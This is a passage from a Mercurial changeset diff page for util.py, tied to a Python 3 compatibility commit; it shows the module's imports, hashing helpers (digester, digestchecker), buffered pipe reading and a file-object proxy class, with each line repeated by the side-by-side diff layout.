##// END OF EJS Templates
py3: cast attribute name to sysstr in clearcachedproperty()
Yuya Nishihara -
r40725:475921a3 default
parent child Browse files
Show More
@@ -1,3986 +1,3987 b''
1 # util.py - Mercurial utility functions and platform specific implementations
1 # util.py - Mercurial utility functions and platform specific implementations
2 #
2 #
3 # Copyright 2005 K. Thananchayan <thananck@yahoo.com>
3 # Copyright 2005 K. Thananchayan <thananck@yahoo.com>
4 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
4 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
6 #
6 #
7 # This software may be used and distributed according to the terms of the
7 # This software may be used and distributed according to the terms of the
8 # GNU General Public License version 2 or any later version.
8 # GNU General Public License version 2 or any later version.
9
9
10 """Mercurial utility functions and platform specific implementations.
10 """Mercurial utility functions and platform specific implementations.
11
11
12 This contains helper routines that are independent of the SCM core and
12 This contains helper routines that are independent of the SCM core and
13 hide platform-specific details from the core.
13 hide platform-specific details from the core.
14 """
14 """
15
15
16 from __future__ import absolute_import, print_function
16 from __future__ import absolute_import, print_function
17
17
18 import abc
18 import abc
19 import bz2
19 import bz2
20 import collections
20 import collections
21 import contextlib
21 import contextlib
22 import errno
22 import errno
23 import gc
23 import gc
24 import hashlib
24 import hashlib
25 import itertools
25 import itertools
26 import mmap
26 import mmap
27 import os
27 import os
28 import platform as pyplatform
28 import platform as pyplatform
29 import re as remod
29 import re as remod
30 import shutil
30 import shutil
31 import socket
31 import socket
32 import stat
32 import stat
33 import sys
33 import sys
34 import time
34 import time
35 import traceback
35 import traceback
36 import warnings
36 import warnings
37 import zlib
37 import zlib
38
38
39 from .thirdparty import (
39 from .thirdparty import (
40 attr,
40 attr,
41 )
41 )
42 from hgdemandimport import tracing
42 from hgdemandimport import tracing
43 from . import (
43 from . import (
44 encoding,
44 encoding,
45 error,
45 error,
46 i18n,
46 i18n,
47 node as nodemod,
47 node as nodemod,
48 policy,
48 policy,
49 pycompat,
49 pycompat,
50 urllibcompat,
50 urllibcompat,
51 )
51 )
52 from .utils import (
52 from .utils import (
53 procutil,
53 procutil,
54 stringutil,
54 stringutil,
55 )
55 )
56
56
57 base85 = policy.importmod(r'base85')
57 base85 = policy.importmod(r'base85')
58 osutil = policy.importmod(r'osutil')
58 osutil = policy.importmod(r'osutil')
59 parsers = policy.importmod(r'parsers')
59 parsers = policy.importmod(r'parsers')
60
60
61 b85decode = base85.b85decode
61 b85decode = base85.b85decode
62 b85encode = base85.b85encode
62 b85encode = base85.b85encode
63
63
64 cookielib = pycompat.cookielib
64 cookielib = pycompat.cookielib
65 httplib = pycompat.httplib
65 httplib = pycompat.httplib
66 pickle = pycompat.pickle
66 pickle = pycompat.pickle
67 safehasattr = pycompat.safehasattr
67 safehasattr = pycompat.safehasattr
68 socketserver = pycompat.socketserver
68 socketserver = pycompat.socketserver
69 bytesio = pycompat.bytesio
69 bytesio = pycompat.bytesio
70 # TODO deprecate stringio name, as it is a lie on Python 3.
70 # TODO deprecate stringio name, as it is a lie on Python 3.
71 stringio = bytesio
71 stringio = bytesio
72 xmlrpclib = pycompat.xmlrpclib
72 xmlrpclib = pycompat.xmlrpclib
73
73
74 httpserver = urllibcompat.httpserver
74 httpserver = urllibcompat.httpserver
75 urlerr = urllibcompat.urlerr
75 urlerr = urllibcompat.urlerr
76 urlreq = urllibcompat.urlreq
76 urlreq = urllibcompat.urlreq
77
77
78 # workaround for win32mbcs
78 # workaround for win32mbcs
79 _filenamebytestr = pycompat.bytestr
79 _filenamebytestr = pycompat.bytestr
80
80
81 if pycompat.iswindows:
81 if pycompat.iswindows:
82 from . import windows as platform
82 from . import windows as platform
83 else:
83 else:
84 from . import posix as platform
84 from . import posix as platform
85
85
86 _ = i18n._
86 _ = i18n._
87
87
88 bindunixsocket = platform.bindunixsocket
88 bindunixsocket = platform.bindunixsocket
89 cachestat = platform.cachestat
89 cachestat = platform.cachestat
90 checkexec = platform.checkexec
90 checkexec = platform.checkexec
91 checklink = platform.checklink
91 checklink = platform.checklink
92 copymode = platform.copymode
92 copymode = platform.copymode
93 expandglobs = platform.expandglobs
93 expandglobs = platform.expandglobs
94 getfsmountpoint = platform.getfsmountpoint
94 getfsmountpoint = platform.getfsmountpoint
95 getfstype = platform.getfstype
95 getfstype = platform.getfstype
96 groupmembers = platform.groupmembers
96 groupmembers = platform.groupmembers
97 groupname = platform.groupname
97 groupname = platform.groupname
98 isexec = platform.isexec
98 isexec = platform.isexec
99 isowner = platform.isowner
99 isowner = platform.isowner
100 listdir = osutil.listdir
100 listdir = osutil.listdir
101 localpath = platform.localpath
101 localpath = platform.localpath
102 lookupreg = platform.lookupreg
102 lookupreg = platform.lookupreg
103 makedir = platform.makedir
103 makedir = platform.makedir
104 nlinks = platform.nlinks
104 nlinks = platform.nlinks
105 normpath = platform.normpath
105 normpath = platform.normpath
106 normcase = platform.normcase
106 normcase = platform.normcase
107 normcasespec = platform.normcasespec
107 normcasespec = platform.normcasespec
108 normcasefallback = platform.normcasefallback
108 normcasefallback = platform.normcasefallback
109 openhardlinks = platform.openhardlinks
109 openhardlinks = platform.openhardlinks
110 oslink = platform.oslink
110 oslink = platform.oslink
111 parsepatchoutput = platform.parsepatchoutput
111 parsepatchoutput = platform.parsepatchoutput
112 pconvert = platform.pconvert
112 pconvert = platform.pconvert
113 poll = platform.poll
113 poll = platform.poll
114 posixfile = platform.posixfile
114 posixfile = platform.posixfile
115 readlink = platform.readlink
115 readlink = platform.readlink
116 rename = platform.rename
116 rename = platform.rename
117 removedirs = platform.removedirs
117 removedirs = platform.removedirs
118 samedevice = platform.samedevice
118 samedevice = platform.samedevice
119 samefile = platform.samefile
119 samefile = platform.samefile
120 samestat = platform.samestat
120 samestat = platform.samestat
121 setflags = platform.setflags
121 setflags = platform.setflags
122 split = platform.split
122 split = platform.split
123 statfiles = getattr(osutil, 'statfiles', platform.statfiles)
123 statfiles = getattr(osutil, 'statfiles', platform.statfiles)
124 statisexec = platform.statisexec
124 statisexec = platform.statisexec
125 statislink = platform.statislink
125 statislink = platform.statislink
126 umask = platform.umask
126 umask = platform.umask
127 unlink = platform.unlink
127 unlink = platform.unlink
128 username = platform.username
128 username = platform.username
129
129
130 try:
130 try:
131 recvfds = osutil.recvfds
131 recvfds = osutil.recvfds
132 except AttributeError:
132 except AttributeError:
133 pass
133 pass
134
134
135 # Python compatibility
135 # Python compatibility
136
136
137 _notset = object()
137 _notset = object()
138
138
139 def bitsfrom(container):
139 def bitsfrom(container):
140 bits = 0
140 bits = 0
141 for bit in container:
141 for bit in container:
142 bits |= bit
142 bits |= bit
143 return bits
143 return bits
144
144
145 # python 2.6 still have deprecation warning enabled by default. We do not want
145 # python 2.6 still have deprecation warning enabled by default. We do not want
146 # to display anything to standard user so detect if we are running test and
146 # to display anything to standard user so detect if we are running test and
147 # only use python deprecation warning in this case.
147 # only use python deprecation warning in this case.
148 _dowarn = bool(encoding.environ.get('HGEMITWARNINGS'))
148 _dowarn = bool(encoding.environ.get('HGEMITWARNINGS'))
149 if _dowarn:
149 if _dowarn:
150 # explicitly unfilter our warning for python 2.7
150 # explicitly unfilter our warning for python 2.7
151 #
151 #
152 # The option of setting PYTHONWARNINGS in the test runner was investigated.
152 # The option of setting PYTHONWARNINGS in the test runner was investigated.
153 # However, module name set through PYTHONWARNINGS was exactly matched, so
153 # However, module name set through PYTHONWARNINGS was exactly matched, so
154 # we cannot set 'mercurial' and have it match eg: 'mercurial.scmutil'. This
154 # we cannot set 'mercurial' and have it match eg: 'mercurial.scmutil'. This
155 # makes the whole PYTHONWARNINGS thing useless for our usecase.
155 # makes the whole PYTHONWARNINGS thing useless for our usecase.
156 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'mercurial')
156 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'mercurial')
157 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext')
157 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext')
158 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext3rd')
158 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext3rd')
159 if _dowarn and pycompat.ispy3:
159 if _dowarn and pycompat.ispy3:
160 # silence warning emitted by passing user string to re.sub()
160 # silence warning emitted by passing user string to re.sub()
161 warnings.filterwarnings(r'ignore', r'bad escape', DeprecationWarning,
161 warnings.filterwarnings(r'ignore', r'bad escape', DeprecationWarning,
162 r'mercurial')
162 r'mercurial')
163 warnings.filterwarnings(r'ignore', r'invalid escape sequence',
163 warnings.filterwarnings(r'ignore', r'invalid escape sequence',
164 DeprecationWarning, r'mercurial')
164 DeprecationWarning, r'mercurial')
165 # TODO: reinvent imp.is_frozen()
165 # TODO: reinvent imp.is_frozen()
166 warnings.filterwarnings(r'ignore', r'the imp module is deprecated',
166 warnings.filterwarnings(r'ignore', r'the imp module is deprecated',
167 DeprecationWarning, r'mercurial')
167 DeprecationWarning, r'mercurial')
168
168
169 def nouideprecwarn(msg, version, stacklevel=1):
169 def nouideprecwarn(msg, version, stacklevel=1):
170 """Issue an python native deprecation warning
170 """Issue an python native deprecation warning
171
171
172 This is a noop outside of tests, use 'ui.deprecwarn' when possible.
172 This is a noop outside of tests, use 'ui.deprecwarn' when possible.
173 """
173 """
174 if _dowarn:
174 if _dowarn:
175 msg += ("\n(compatibility will be dropped after Mercurial-%s,"
175 msg += ("\n(compatibility will be dropped after Mercurial-%s,"
176 " update your code.)") % version
176 " update your code.)") % version
177 warnings.warn(pycompat.sysstr(msg), DeprecationWarning, stacklevel + 1)
177 warnings.warn(pycompat.sysstr(msg), DeprecationWarning, stacklevel + 1)
178
178
179 DIGESTS = {
179 DIGESTS = {
180 'md5': hashlib.md5,
180 'md5': hashlib.md5,
181 'sha1': hashlib.sha1,
181 'sha1': hashlib.sha1,
182 'sha512': hashlib.sha512,
182 'sha512': hashlib.sha512,
183 }
183 }
184 # List of digest types from strongest to weakest
184 # List of digest types from strongest to weakest
185 DIGESTS_BY_STRENGTH = ['sha512', 'sha1', 'md5']
185 DIGESTS_BY_STRENGTH = ['sha512', 'sha1', 'md5']
186
186
187 for k in DIGESTS_BY_STRENGTH:
187 for k in DIGESTS_BY_STRENGTH:
188 assert k in DIGESTS
188 assert k in DIGESTS
189
189
190 class digester(object):
190 class digester(object):
191 """helper to compute digests.
191 """helper to compute digests.
192
192
193 This helper can be used to compute one or more digests given their name.
193 This helper can be used to compute one or more digests given their name.
194
194
195 >>> d = digester([b'md5', b'sha1'])
195 >>> d = digester([b'md5', b'sha1'])
196 >>> d.update(b'foo')
196 >>> d.update(b'foo')
197 >>> [k for k in sorted(d)]
197 >>> [k for k in sorted(d)]
198 ['md5', 'sha1']
198 ['md5', 'sha1']
199 >>> d[b'md5']
199 >>> d[b'md5']
200 'acbd18db4cc2f85cedef654fccc4a4d8'
200 'acbd18db4cc2f85cedef654fccc4a4d8'
201 >>> d[b'sha1']
201 >>> d[b'sha1']
202 '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
202 '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
203 >>> digester.preferred([b'md5', b'sha1'])
203 >>> digester.preferred([b'md5', b'sha1'])
204 'sha1'
204 'sha1'
205 """
205 """
206
206
207 def __init__(self, digests, s=''):
207 def __init__(self, digests, s=''):
208 self._hashes = {}
208 self._hashes = {}
209 for k in digests:
209 for k in digests:
210 if k not in DIGESTS:
210 if k not in DIGESTS:
211 raise error.Abort(_('unknown digest type: %s') % k)
211 raise error.Abort(_('unknown digest type: %s') % k)
212 self._hashes[k] = DIGESTS[k]()
212 self._hashes[k] = DIGESTS[k]()
213 if s:
213 if s:
214 self.update(s)
214 self.update(s)
215
215
216 def update(self, data):
216 def update(self, data):
217 for h in self._hashes.values():
217 for h in self._hashes.values():
218 h.update(data)
218 h.update(data)
219
219
220 def __getitem__(self, key):
220 def __getitem__(self, key):
221 if key not in DIGESTS:
221 if key not in DIGESTS:
222 raise error.Abort(_('unknown digest type: %s') % k)
222 raise error.Abort(_('unknown digest type: %s') % k)
223 return nodemod.hex(self._hashes[key].digest())
223 return nodemod.hex(self._hashes[key].digest())
224
224
225 def __iter__(self):
225 def __iter__(self):
226 return iter(self._hashes)
226 return iter(self._hashes)
227
227
228 @staticmethod
228 @staticmethod
229 def preferred(supported):
229 def preferred(supported):
230 """returns the strongest digest type in both supported and DIGESTS."""
230 """returns the strongest digest type in both supported and DIGESTS."""
231
231
232 for k in DIGESTS_BY_STRENGTH:
232 for k in DIGESTS_BY_STRENGTH:
233 if k in supported:
233 if k in supported:
234 return k
234 return k
235 return None
235 return None
236
236
237 class digestchecker(object):
237 class digestchecker(object):
238 """file handle wrapper that additionally checks content against a given
238 """file handle wrapper that additionally checks content against a given
239 size and digests.
239 size and digests.
240
240
241 d = digestchecker(fh, size, {'md5': '...'})
241 d = digestchecker(fh, size, {'md5': '...'})
242
242
243 When multiple digests are given, all of them are validated.
243 When multiple digests are given, all of them are validated.
244 """
244 """
245
245
246 def __init__(self, fh, size, digests):
246 def __init__(self, fh, size, digests):
247 self._fh = fh
247 self._fh = fh
248 self._size = size
248 self._size = size
249 self._got = 0
249 self._got = 0
250 self._digests = dict(digests)
250 self._digests = dict(digests)
251 self._digester = digester(self._digests.keys())
251 self._digester = digester(self._digests.keys())
252
252
253 def read(self, length=-1):
253 def read(self, length=-1):
254 content = self._fh.read(length)
254 content = self._fh.read(length)
255 self._digester.update(content)
255 self._digester.update(content)
256 self._got += len(content)
256 self._got += len(content)
257 return content
257 return content
258
258
259 def validate(self):
259 def validate(self):
260 if self._size != self._got:
260 if self._size != self._got:
261 raise error.Abort(_('size mismatch: expected %d, got %d') %
261 raise error.Abort(_('size mismatch: expected %d, got %d') %
262 (self._size, self._got))
262 (self._size, self._got))
263 for k, v in self._digests.items():
263 for k, v in self._digests.items():
264 if v != self._digester[k]:
264 if v != self._digester[k]:
265 # i18n: first parameter is a digest name
265 # i18n: first parameter is a digest name
266 raise error.Abort(_('%s mismatch: expected %s, got %s') %
266 raise error.Abort(_('%s mismatch: expected %s, got %s') %
267 (k, v, self._digester[k]))
267 (k, v, self._digester[k]))
268
268
269 try:
269 try:
270 buffer = buffer
270 buffer = buffer
271 except NameError:
271 except NameError:
272 def buffer(sliceable, offset=0, length=None):
272 def buffer(sliceable, offset=0, length=None):
273 if length is not None:
273 if length is not None:
274 return memoryview(sliceable)[offset:offset + length]
274 return memoryview(sliceable)[offset:offset + length]
275 return memoryview(sliceable)[offset:]
275 return memoryview(sliceable)[offset:]
276
276
277 _chunksize = 4096
277 _chunksize = 4096
278
278
279 class bufferedinputpipe(object):
279 class bufferedinputpipe(object):
280 """a manually buffered input pipe
280 """a manually buffered input pipe
281
281
282 Python will not let us use buffered IO and lazy reading with 'polling' at
282 Python will not let us use buffered IO and lazy reading with 'polling' at
283 the same time. We cannot probe the buffer state and select will not detect
283 the same time. We cannot probe the buffer state and select will not detect
284 that data are ready to read if they are already buffered.
284 that data are ready to read if they are already buffered.
285
285
286 This class let us work around that by implementing its own buffering
286 This class let us work around that by implementing its own buffering
287 (allowing efficient readline) while offering a way to know if the buffer is
287 (allowing efficient readline) while offering a way to know if the buffer is
288 empty from the output (allowing collaboration of the buffer with polling).
288 empty from the output (allowing collaboration of the buffer with polling).
289
289
290 This class lives in the 'util' module because it makes use of the 'os'
290 This class lives in the 'util' module because it makes use of the 'os'
291 module from the python stdlib.
291 module from the python stdlib.
292 """
292 """
293 def __new__(cls, fh):
293 def __new__(cls, fh):
294 # If we receive a fileobjectproxy, we need to use a variation of this
294 # If we receive a fileobjectproxy, we need to use a variation of this
295 # class that notifies observers about activity.
295 # class that notifies observers about activity.
296 if isinstance(fh, fileobjectproxy):
296 if isinstance(fh, fileobjectproxy):
297 cls = observedbufferedinputpipe
297 cls = observedbufferedinputpipe
298
298
299 return super(bufferedinputpipe, cls).__new__(cls)
299 return super(bufferedinputpipe, cls).__new__(cls)
300
300
301 def __init__(self, input):
301 def __init__(self, input):
302 self._input = input
302 self._input = input
303 self._buffer = []
303 self._buffer = []
304 self._eof = False
304 self._eof = False
305 self._lenbuf = 0
305 self._lenbuf = 0
306
306
307 @property
307 @property
308 def hasbuffer(self):
308 def hasbuffer(self):
309 """True is any data is currently buffered
309 """True is any data is currently buffered
310
310
311 This will be used externally a pre-step for polling IO. If there is
311 This will be used externally a pre-step for polling IO. If there is
312 already data then no polling should be set in place."""
312 already data then no polling should be set in place."""
313 return bool(self._buffer)
313 return bool(self._buffer)
314
314
315 @property
315 @property
316 def closed(self):
316 def closed(self):
317 return self._input.closed
317 return self._input.closed
318
318
319 def fileno(self):
319 def fileno(self):
320 return self._input.fileno()
320 return self._input.fileno()
321
321
322 def close(self):
322 def close(self):
323 return self._input.close()
323 return self._input.close()
324
324
325 def read(self, size):
325 def read(self, size):
326 while (not self._eof) and (self._lenbuf < size):
326 while (not self._eof) and (self._lenbuf < size):
327 self._fillbuffer()
327 self._fillbuffer()
328 return self._frombuffer(size)
328 return self._frombuffer(size)
329
329
330 def unbufferedread(self, size):
330 def unbufferedread(self, size):
331 if not self._eof and self._lenbuf == 0:
331 if not self._eof and self._lenbuf == 0:
332 self._fillbuffer(max(size, _chunksize))
332 self._fillbuffer(max(size, _chunksize))
333 return self._frombuffer(min(self._lenbuf, size))
333 return self._frombuffer(min(self._lenbuf, size))
334
334
335 def readline(self, *args, **kwargs):
335 def readline(self, *args, **kwargs):
336 if len(self._buffer) > 1:
336 if len(self._buffer) > 1:
337 # this should not happen because both read and readline end with a
337 # this should not happen because both read and readline end with a
338 # _frombuffer call that collapse it.
338 # _frombuffer call that collapse it.
339 self._buffer = [''.join(self._buffer)]
339 self._buffer = [''.join(self._buffer)]
340 self._lenbuf = len(self._buffer[0])
340 self._lenbuf = len(self._buffer[0])
341 lfi = -1
341 lfi = -1
342 if self._buffer:
342 if self._buffer:
343 lfi = self._buffer[-1].find('\n')
343 lfi = self._buffer[-1].find('\n')
344 while (not self._eof) and lfi < 0:
344 while (not self._eof) and lfi < 0:
345 self._fillbuffer()
345 self._fillbuffer()
346 if self._buffer:
346 if self._buffer:
347 lfi = self._buffer[-1].find('\n')
347 lfi = self._buffer[-1].find('\n')
348 size = lfi + 1
348 size = lfi + 1
349 if lfi < 0: # end of file
349 if lfi < 0: # end of file
350 size = self._lenbuf
350 size = self._lenbuf
351 elif len(self._buffer) > 1:
351 elif len(self._buffer) > 1:
352 # we need to take previous chunks into account
352 # we need to take previous chunks into account
353 size += self._lenbuf - len(self._buffer[-1])
353 size += self._lenbuf - len(self._buffer[-1])
354 return self._frombuffer(size)
354 return self._frombuffer(size)
355
355
356 def _frombuffer(self, size):
356 def _frombuffer(self, size):
357 """return at most 'size' data from the buffer
357 """return at most 'size' data from the buffer
358
358
359 The data are removed from the buffer."""
359 The data are removed from the buffer."""
360 if size == 0 or not self._buffer:
360 if size == 0 or not self._buffer:
361 return ''
361 return ''
362 buf = self._buffer[0]
362 buf = self._buffer[0]
363 if len(self._buffer) > 1:
363 if len(self._buffer) > 1:
364 buf = ''.join(self._buffer)
364 buf = ''.join(self._buffer)
365
365
366 data = buf[:size]
366 data = buf[:size]
367 buf = buf[len(data):]
367 buf = buf[len(data):]
368 if buf:
368 if buf:
369 self._buffer = [buf]
369 self._buffer = [buf]
370 self._lenbuf = len(buf)
370 self._lenbuf = len(buf)
371 else:
371 else:
372 self._buffer = []
372 self._buffer = []
373 self._lenbuf = 0
373 self._lenbuf = 0
374 return data
374 return data
375
375
376 def _fillbuffer(self, size=_chunksize):
376 def _fillbuffer(self, size=_chunksize):
377 """read data to the buffer"""
377 """read data to the buffer"""
378 data = os.read(self._input.fileno(), size)
378 data = os.read(self._input.fileno(), size)
379 if not data:
379 if not data:
380 self._eof = True
380 self._eof = True
381 else:
381 else:
382 self._lenbuf += len(data)
382 self._lenbuf += len(data)
383 self._buffer.append(data)
383 self._buffer.append(data)
384
384
385 return data
385 return data
386
386
387 def mmapread(fp):
387 def mmapread(fp):
388 try:
388 try:
389 fd = getattr(fp, 'fileno', lambda: fp)()
389 fd = getattr(fp, 'fileno', lambda: fp)()
390 return mmap.mmap(fd, 0, access=mmap.ACCESS_READ)
390 return mmap.mmap(fd, 0, access=mmap.ACCESS_READ)
391 except ValueError:
391 except ValueError:
392 # Empty files cannot be mmapped, but mmapread should still work. Check
392 # Empty files cannot be mmapped, but mmapread should still work. Check
393 # if the file is empty, and if so, return an empty buffer.
393 # if the file is empty, and if so, return an empty buffer.
394 if os.fstat(fd).st_size == 0:
394 if os.fstat(fd).st_size == 0:
395 return ''
395 return ''
396 raise
396 raise
397
397
398 class fileobjectproxy(object):
398 class fileobjectproxy(object):
399 """A proxy around file objects that tells a watcher when events occur.
399 """A proxy around file objects that tells a watcher when events occur.
400
400
401 This type is intended to only be used for testing purposes. Think hard
401 This type is intended to only be used for testing purposes. Think hard
402 before using it in important code.
402 before using it in important code.
403 """
403 """
404 __slots__ = (
404 __slots__ = (
405 r'_orig',
405 r'_orig',
406 r'_observer',
406 r'_observer',
407 )
407 )
408
408
409 def __init__(self, fh, observer):
409 def __init__(self, fh, observer):
410 object.__setattr__(self, r'_orig', fh)
410 object.__setattr__(self, r'_orig', fh)
411 object.__setattr__(self, r'_observer', observer)
411 object.__setattr__(self, r'_observer', observer)
412
412
413 def __getattribute__(self, name):
413 def __getattribute__(self, name):
414 ours = {
414 ours = {
415 r'_observer',
415 r'_observer',
416
416
417 # IOBase
417 # IOBase
418 r'close',
418 r'close',
419 # closed if a property
419 # closed if a property
420 r'fileno',
420 r'fileno',
421 r'flush',
421 r'flush',
422 r'isatty',
422 r'isatty',
423 r'readable',
423 r'readable',
424 r'readline',
424 r'readline',
425 r'readlines',
425 r'readlines',
426 r'seek',
426 r'seek',
427 r'seekable',
427 r'seekable',
428 r'tell',
428 r'tell',
429 r'truncate',
429 r'truncate',
430 r'writable',
430 r'writable',
431 r'writelines',
431 r'writelines',
432 # RawIOBase
432 # RawIOBase
433 r'read',
433 r'read',
434 r'readall',
434 r'readall',
435 r'readinto',
435 r'readinto',
436 r'write',
436 r'write',
437 # BufferedIOBase
437 # BufferedIOBase
438 # raw is a property
438 # raw is a property
439 r'detach',
439 r'detach',
440 # read defined above
440 # read defined above
441 r'read1',
441 r'read1',
442 # readinto defined above
442 # readinto defined above
443 # write defined above
443 # write defined above
444 }
444 }
445
445
446 # We only observe some methods.
446 # We only observe some methods.
447 if name in ours:
447 if name in ours:
448 return object.__getattribute__(self, name)
448 return object.__getattribute__(self, name)
449
449
450 return getattr(object.__getattribute__(self, r'_orig'), name)
450 return getattr(object.__getattribute__(self, r'_orig'), name)
451
451
452 def __nonzero__(self):
452 def __nonzero__(self):
453 return bool(object.__getattribute__(self, r'_orig'))
453 return bool(object.__getattribute__(self, r'_orig'))
454
454
455 __bool__ = __nonzero__
455 __bool__ = __nonzero__
456
456
457 def __delattr__(self, name):
457 def __delattr__(self, name):
458 return delattr(object.__getattribute__(self, r'_orig'), name)
458 return delattr(object.__getattribute__(self, r'_orig'), name)
459
459
460 def __setattr__(self, name, value):
460 def __setattr__(self, name, value):
461 return setattr(object.__getattribute__(self, r'_orig'), name, value)
461 return setattr(object.__getattribute__(self, r'_orig'), name, value)
462
462
463 def __iter__(self):
463 def __iter__(self):
464 return object.__getattribute__(self, r'_orig').__iter__()
464 return object.__getattribute__(self, r'_orig').__iter__()
465
465
466 def _observedcall(self, name, *args, **kwargs):
466 def _observedcall(self, name, *args, **kwargs):
467 # Call the original object.
467 # Call the original object.
468 orig = object.__getattribute__(self, r'_orig')
468 orig = object.__getattribute__(self, r'_orig')
469 res = getattr(orig, name)(*args, **kwargs)
469 res = getattr(orig, name)(*args, **kwargs)
470
470
471 # Call a method on the observer of the same name with arguments
471 # Call a method on the observer of the same name with arguments
472 # so it can react, log, etc.
472 # so it can react, log, etc.
473 observer = object.__getattribute__(self, r'_observer')
473 observer = object.__getattribute__(self, r'_observer')
474 fn = getattr(observer, name, None)
474 fn = getattr(observer, name, None)
475 if fn:
475 if fn:
476 fn(res, *args, **kwargs)
476 fn(res, *args, **kwargs)
477
477
478 return res
478 return res
479
479
480 def close(self, *args, **kwargs):
480 def close(self, *args, **kwargs):
481 return object.__getattribute__(self, r'_observedcall')(
481 return object.__getattribute__(self, r'_observedcall')(
482 r'close', *args, **kwargs)
482 r'close', *args, **kwargs)
483
483
484 def fileno(self, *args, **kwargs):
484 def fileno(self, *args, **kwargs):
485 return object.__getattribute__(self, r'_observedcall')(
485 return object.__getattribute__(self, r'_observedcall')(
486 r'fileno', *args, **kwargs)
486 r'fileno', *args, **kwargs)
487
487
488 def flush(self, *args, **kwargs):
488 def flush(self, *args, **kwargs):
489 return object.__getattribute__(self, r'_observedcall')(
489 return object.__getattribute__(self, r'_observedcall')(
490 r'flush', *args, **kwargs)
490 r'flush', *args, **kwargs)
491
491
492 def isatty(self, *args, **kwargs):
492 def isatty(self, *args, **kwargs):
493 return object.__getattribute__(self, r'_observedcall')(
493 return object.__getattribute__(self, r'_observedcall')(
494 r'isatty', *args, **kwargs)
494 r'isatty', *args, **kwargs)
495
495
496 def readable(self, *args, **kwargs):
496 def readable(self, *args, **kwargs):
497 return object.__getattribute__(self, r'_observedcall')(
497 return object.__getattribute__(self, r'_observedcall')(
498 r'readable', *args, **kwargs)
498 r'readable', *args, **kwargs)
499
499
500 def readline(self, *args, **kwargs):
500 def readline(self, *args, **kwargs):
501 return object.__getattribute__(self, r'_observedcall')(
501 return object.__getattribute__(self, r'_observedcall')(
502 r'readline', *args, **kwargs)
502 r'readline', *args, **kwargs)
503
503
504 def readlines(self, *args, **kwargs):
504 def readlines(self, *args, **kwargs):
505 return object.__getattribute__(self, r'_observedcall')(
505 return object.__getattribute__(self, r'_observedcall')(
506 r'readlines', *args, **kwargs)
506 r'readlines', *args, **kwargs)
507
507
508 def seek(self, *args, **kwargs):
508 def seek(self, *args, **kwargs):
509 return object.__getattribute__(self, r'_observedcall')(
509 return object.__getattribute__(self, r'_observedcall')(
510 r'seek', *args, **kwargs)
510 r'seek', *args, **kwargs)
511
511
512 def seekable(self, *args, **kwargs):
512 def seekable(self, *args, **kwargs):
513 return object.__getattribute__(self, r'_observedcall')(
513 return object.__getattribute__(self, r'_observedcall')(
514 r'seekable', *args, **kwargs)
514 r'seekable', *args, **kwargs)
515
515
516 def tell(self, *args, **kwargs):
516 def tell(self, *args, **kwargs):
517 return object.__getattribute__(self, r'_observedcall')(
517 return object.__getattribute__(self, r'_observedcall')(
518 r'tell', *args, **kwargs)
518 r'tell', *args, **kwargs)
519
519
520 def truncate(self, *args, **kwargs):
520 def truncate(self, *args, **kwargs):
521 return object.__getattribute__(self, r'_observedcall')(
521 return object.__getattribute__(self, r'_observedcall')(
522 r'truncate', *args, **kwargs)
522 r'truncate', *args, **kwargs)
523
523
524 def writable(self, *args, **kwargs):
524 def writable(self, *args, **kwargs):
525 return object.__getattribute__(self, r'_observedcall')(
525 return object.__getattribute__(self, r'_observedcall')(
526 r'writable', *args, **kwargs)
526 r'writable', *args, **kwargs)
527
527
528 def writelines(self, *args, **kwargs):
528 def writelines(self, *args, **kwargs):
529 return object.__getattribute__(self, r'_observedcall')(
529 return object.__getattribute__(self, r'_observedcall')(
530 r'writelines', *args, **kwargs)
530 r'writelines', *args, **kwargs)
531
531
532 def read(self, *args, **kwargs):
532 def read(self, *args, **kwargs):
533 return object.__getattribute__(self, r'_observedcall')(
533 return object.__getattribute__(self, r'_observedcall')(
534 r'read', *args, **kwargs)
534 r'read', *args, **kwargs)
535
535
536 def readall(self, *args, **kwargs):
536 def readall(self, *args, **kwargs):
537 return object.__getattribute__(self, r'_observedcall')(
537 return object.__getattribute__(self, r'_observedcall')(
538 r'readall', *args, **kwargs)
538 r'readall', *args, **kwargs)
539
539
540 def readinto(self, *args, **kwargs):
540 def readinto(self, *args, **kwargs):
541 return object.__getattribute__(self, r'_observedcall')(
541 return object.__getattribute__(self, r'_observedcall')(
542 r'readinto', *args, **kwargs)
542 r'readinto', *args, **kwargs)
543
543
544 def write(self, *args, **kwargs):
544 def write(self, *args, **kwargs):
545 return object.__getattribute__(self, r'_observedcall')(
545 return object.__getattribute__(self, r'_observedcall')(
546 r'write', *args, **kwargs)
546 r'write', *args, **kwargs)
547
547
548 def detach(self, *args, **kwargs):
548 def detach(self, *args, **kwargs):
549 return object.__getattribute__(self, r'_observedcall')(
549 return object.__getattribute__(self, r'_observedcall')(
550 r'detach', *args, **kwargs)
550 r'detach', *args, **kwargs)
551
551
552 def read1(self, *args, **kwargs):
552 def read1(self, *args, **kwargs):
553 return object.__getattribute__(self, r'_observedcall')(
553 return object.__getattribute__(self, r'_observedcall')(
554 r'read1', *args, **kwargs)
554 r'read1', *args, **kwargs)
555
555
556 class observedbufferedinputpipe(bufferedinputpipe):
556 class observedbufferedinputpipe(bufferedinputpipe):
557 """A variation of bufferedinputpipe that is aware of fileobjectproxy.
557 """A variation of bufferedinputpipe that is aware of fileobjectproxy.
558
558
559 ``bufferedinputpipe`` makes low-level calls to ``os.read()`` that
559 ``bufferedinputpipe`` makes low-level calls to ``os.read()`` that
560 bypass ``fileobjectproxy``. Because of this, we need to make
560 bypass ``fileobjectproxy``. Because of this, we need to make
561 ``bufferedinputpipe`` aware of these operations.
561 ``bufferedinputpipe`` aware of these operations.
562
562
563 This variation of ``bufferedinputpipe`` can notify observers about
563 This variation of ``bufferedinputpipe`` can notify observers about
564 ``os.read()`` events. It also re-publishes other events, such as
564 ``os.read()`` events. It also re-publishes other events, such as
